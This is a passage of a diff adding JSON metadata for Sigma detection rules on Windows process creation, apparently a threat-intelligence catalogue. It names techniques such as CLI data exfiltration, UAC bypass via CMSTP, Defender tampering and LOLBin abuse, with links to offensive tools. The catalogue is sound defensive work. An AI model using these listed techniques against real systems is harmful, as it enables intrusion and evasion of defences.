+ "filename": 
"proc_creation_win_susp_schtasks_disable.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://twitter.com/MichalKoczwara/status/1553634816016498688", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_disable.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "value": "Disable Important Scheduled Task" + }, + { + "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/13", + "falsepositive": [ + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + ], + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ] + }, + "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "value": "Execute MSDT Via Answer File" + }, + { + "description": "Detects suspicious PowerShell invocation with a parameter substring", + "meta": { + "author": "Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_powershell_susp_parameter_variation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "36210e0d-5b19-485d-a087-c096088885f0", + "value": "Suspicious PowerShell Parameter Substring" + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2022/08/20", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "filename": "proc_creation_win_susp_pester_parent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://twitter.com/_st0pp3r_/status/1560072680887525378", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", + "value": "Execute Code with Pester.bat as Parent" + }, + { + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", + "meta": { + "author": "frack113", + "creation_date": "2021/08/19", + "falsepositive": [ + "GPO" + ], + "filename": 
"proc_creation_win_susp_screensaver_reg.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_screensaver_reg.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.002" + ] + }, + "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", + "value": "Suspicious ScreenSave Change by Reg.exe" + }, + { + "description": "Detects Office Applications executing a Windows child process including directory traversal patterns", + "meta": { + "author": "@SBousseaden (idea), Christian Burkard (rule)", + "creation_date": "2022/06/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_dir_traversal_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1531653369546301440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_dir_traversal_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "868955d9-697e-45d4-a3da-360cefd7c216", + "value": "Office Directory Traversal CommandLine" + }, + { + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/28", + "falsepositive": [ + "Legitimate piping of the password to anydesk", + "Some FP could occure with similar tools that uses the same command line '--set-password'" + ], + "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "value": "AnyDesk Inline Piped Password" + }, + { + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/01/28", + "falsepositive": [ + "Unknown yet" + ], + "filename": "proc_creation_win_susp_dctask64_proc_inject.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/gN3mes1s/status/1222095963789111296", + "https://twitter.com/gN3mes1s/status/1222088214581825540", + "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "6345b048-8441-43a7-9bed-541133633d7a", + "value": "ZOHO Dctask64 Process Injection" + }, + { + "description": "Detects the use of various cli utility related to web request exfiltrating data", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_exfil_data_via_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": 
"7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "value": "Possible Exfiltration Of Data Via CLI" + }, + { + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/06", + "falsepositive": [ + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" + ], + "filename": "proc_creation_win_susp_gup.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "0a4f6091-223b-41f6-8743-f322ec84930b", + "value": "Suspicious GUP Usage" + }, + { + "description": "Execute C# code located in the consoleapp folder", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate use of dnx.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_dnx.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1027.004" + ] + }, + "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "value": "Application Whitelisting Bypass via Dnx.exe" + }, + { + "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block 
rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/01", + "falsepositive": [ + "Legitimate testing of Microsoft UI parts." + ], + "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", + "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", + "value": "Use of VisualUiaVerifyNative.exe" + }, + { + "description": "Detects suspicious command execution (cmd) via Windows Management Instrumentation (WMI) on a remote host. 
This could be indicative of adversary lateral movement.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_cmd_exectution_via_wmi.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/suspicious-cmd-execution-via-wmi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd_exectution_via_wmi.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "e31f89f7-36fb-4697-8ab6-48823708353b", + "value": "Suspicious Cmd Execution via WMI" + }, + { + "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/31", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_adcspwn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/ADCSPwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1557.001" + ] + }, + "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", + "value": "ADCSPwn Hack Tool" + }, + { + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. 
Variant of Raspberry Robin, as first reported by Red Canary.", + "meta": { + "author": "CD_ROM_", + "creation_date": "2022/05/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_rundll32_parent_explorer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "value": "Rundll32 With Suspicious Parent Process" + }, + { + "description": "Detects suspicious child process creations of VMware Tools process which may indicate persistence setup", + "meta": { + "author": "behops, Bhabesh Raj", + "creation_date": "2021/10/08", + "falsepositive": [ + "Legitimate use by administrator" + ], + "filename": "proc_creation_win_vmtoolsd_susp_child_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmtoolsd_susp_child_process.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1059" + ] + }, + "uuid": "5687f942-867b-4578-ade7-1e341c46e99a", + "value": "VMToolsd Suspicious Child Process" + }, + { + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "meta": { + "author": "@Kostastsale, @TheDFIRReport, slightly modified by pH-T", + "creation_date": "2022/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_schtasks_reg_loader.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", + "value": "Scheduled Task Executing Powershell Encoded Payload from Registry" + }, + { + "description": "Detects a file or folder's permissions being modified or tampered with.", + "meta": { + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/23", + "falsepositive": [ + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" + ], + "filename": "proc_creation_win_file_permission_modifications.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "value": "File or Folder Permissions Modifications" + }, + { + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "meta": { + "author": "frack113, Tim Shelton (update fp)", + "creation_date": "2022/12/05", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_susp_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/SysmonEoP", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_cmd.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "178e615d-e666-498b-9630-9ed363038101", + "value": "Suspicious Elevated System Shell" + }, + { + "description": "Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dns_serverlevelplugindll.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "value": "DNS ServerLevelPluginDll Install" + }, + { + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "meta": { + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate use of cmstp.exe utility by legitimate user" + ], + "filename": "proc_creation_win_uac_bypass_cmstp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" + ] + }, + "uuid": "e66779cc-383e-4224-a3a4-267eeb585c40", + "value": "Bypass UAC via CMSTP" + }, + { + "description": "Detects base64 encoded \"MpPreference\" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/04", + "falsepositive": [ + "Possible Admin Activity", + "Other Cmdlets that may use the same parameters" + ], + "filename": "proc_creation_win_powershell_defender_base64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/AdamTheAnalyst/status/1483497517119590403", + "https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_base64.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "c6fb44c6-71f5-49e6-9462-1425d328aee3", + "value": "Powershell Defender Base64 MpPreference" + }, + { + "description": "Detects PsExec service execution via default service image name", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_tool_psexec.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba", + "value": "PsExec Tool Execution" + }, + { + "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/04", + "falsepositive": [ + "Legitimate use of one of these tools" + ], + "filename": "proc_creation_win_hacktool_imphashes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" + ], + "tags": "No established tags" + }, + "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", + "value": "Windows Hacktool Imphash" + }, + { + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/03/03", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_cve_2021_26857_msexchange.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cve_2021_26857_msexchange.yml" + ], + "tags": [ + "attack.t1203", + "attack.execution", + "cve.2021.26857" + ] + }, + "uuid": "cd479ccc-d8f0-4c66-ba7d-e06286f3f887", + "value": "CVE-2021-26857 Exchange Exploitation" + }, + { + "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/30", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_pua_defendercheck.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/matterpreter/DefenderCheck", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.005" + ] + }, + "uuid": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", + "value": "DefenderCheck Usage" + }, + { + "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
adselfservice plus exploitation)", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2021/12/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", + "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" + ] + }, + "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "value": "Suspicious Shells Spawn by Java Utility Keytool" + }, + { + "description": "Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)", + "meta": { + "author": "Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)", + "creation_date": "2020/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_lazarus_session_highjack.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_session_highjack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "3f7f5b0b-5b16-476c-a85f-ab477f6dd24b", + "value": "Lazarus Session Highjacker" + }, + { + "description": "Detects multiple suspicious process in a limited timeframe", + "meta": { + "author": "juju4", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools 
used in the monitored environment" + ], + "filename": "proc_creation_win_multiple_susp_cli.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://car.mitre.org/wiki/CAR-2013-04-002", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml" + ], + "tags": [ + "car.2013-04-002", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", + "value": "Quick Execution of a Series of Suspicious Commands" + }, + { + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/10", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "proc_creation_win_computer_discovery_get_adcomputer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "435e10e4-992a-4281-96f3-38b11106adde", + "value": "Computer Discovery And Export Via Get-ADComputer Cmdlet" + }, + { + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "meta": { + "author": 
"Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "89a9a0e0-f61a-42e5-8957-b1479565a658", + "value": "UAC Bypass WSReset" + }, + { + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/14", + "falsepositive": [ + "Rare legitimate installation of kernel drivers via sc.exe" + ], + "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "value": "New Kernel Driver Via SC.EXE" + }, + { + "description": "Detects Ryuk ransomware activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_malware_ryuk.yml", + "level": "high", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", + "value": "Ryuk Ransomware" + }, + { + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/147", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "value": "DeviceCredentialDeployment Execution" + }, + { + "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_office_spawning_wmi_commandline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead", + "value": "Office Applications Spawning Wmi Cli Alternate" + }, + { + "description": "Detects manual service execution (start) via system utilities.", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user executes a service for legitimate reasons." + ], + "filename": "proc_creation_win_service_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_service_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "value": "Service Execution" + }, + { + "description": "Detects usage of the SysInternals Procdump utility", + "meta": { 